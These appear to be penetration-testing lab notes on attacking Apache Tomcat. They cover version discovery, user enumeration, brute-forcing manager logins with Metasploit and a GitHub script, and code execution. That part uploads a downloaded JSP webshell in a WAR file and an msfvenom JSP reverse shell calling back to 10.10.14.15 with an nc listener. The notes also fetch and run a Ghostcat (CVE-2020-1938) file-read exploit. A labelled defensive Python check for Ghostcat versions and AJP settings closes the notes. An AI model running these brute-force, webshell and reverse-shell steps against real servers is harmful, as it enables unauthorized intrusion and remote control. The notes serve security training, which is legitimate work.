Tomcat
Discovery
Via 404 page (the default Tomcat error page prints the product and version in its footer)

Via /docs page
$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
Important Files
WEB-INF/web.xml (deployment descriptor): the first file worth reading when an LFI is available, since it maps servlets to their classes and paths
WEB-INF/classes/ may contain business logic and sensitive information (compiled classes, properties files)
tomcat-users.xml defines the users and roles that grant access to /manager and /host-manager
Username Enumeration
msf6 > use auxiliary/scanner/http/tomcat_enum
Exploitation
Finding login page
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
Login Bruteforce
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58
$ git clone https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce
$ python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
Code Execution
Go to /manager/html and upload a WAR file
$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
$ nc -nlvp 4443
$ msfconsole
msf6 > use multi/http/tomcat_mgr_upload
Use this webshell for a stealthier approach: https://github.com/SecurityRiskAdvisors/cmd.jsp
Ghostcat (CVE-2020-1938)
Affects versions before 9.0.31, 8.5.51 and 7.0.100: an unauthenticated client can read files from the web application (for example WEB-INF/web.xml) through the AJP connector on port 8009.
$ nmap -sV -p 8009,8080 app-dev.inlanefreight.local
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
$ wget https://raw.githubusercontent.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py
$ python2.7 CNVD-2020-10487-Tomcat-Ajp-lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
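Added example, not part of the original notes: a small defender-side check for Ghostcat that compares a Tomcat version pulled from a banner (such as the nmap line above) against the fixed releases listed above, and audits the AJP connector in a server.xml for the two hardening settings the fix introduced (loopback binding and a shared secret). The server.xml snippet is constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# First release per branch that fixed CVE-2020-1938 (versions from the notes above).
GHOSTCAT_FIXED = {7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}

def parse_version(banner):
    """Extract an (major, minor, patch) tuple from text like 'Apache Tomcat 9.0.30'."""
    m = re.search(r"Apache Tomcat(?:/| )(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None

def ghostcat_vulnerable(version):
    """True when the version predates the fix for its branch; 10.x+ shipped fixed."""
    fixed = GHOSTCAT_FIXED.get(version[0])
    return fixed is not None and version < fixed

def audit_ajp_connectors(server_xml):
    """Return findings for AJP connectors reachable remotely or lacking a secret."""
    findings = []
    for c in ET.fromstring(server_xml).iter("Connector"):
        if "AJP" not in c.get("protocol", ""):
            continue
        port = c.get("port", "?")
        addr = c.get("address")  # older releases default to all interfaces when unset
        if addr not in ("127.0.0.1", "::1", "localhost"):
            findings.append(f"port {port}: AJP bound to {addr or 'all interfaces (no address set)'}")
        if c.get("secretRequired", "true").lower() != "true":
            findings.append(f"port {port}: secretRequired is disabled")
        elif not c.get("secret"):
            findings.append(f"port {port}: no AJP secret configured")
    return findings

# Constructed server.xml resembling the pre-9.0.31 default: AJP on 8009, no address, no secret.
SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

if __name__ == "__main__":
    v = parse_version("8080/tcp open http Apache Tomcat 9.0.30")
    print("version", v, "vulnerable to Ghostcat:", ghostcat_vulnerable(v))
    for f in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print("finding:", f)
```

If AJP is not needed at all (no reverse proxy speaks it), commenting the connector out removes the exposure entirely; otherwise bind it to loopback and set `secret` so the connector fails closed.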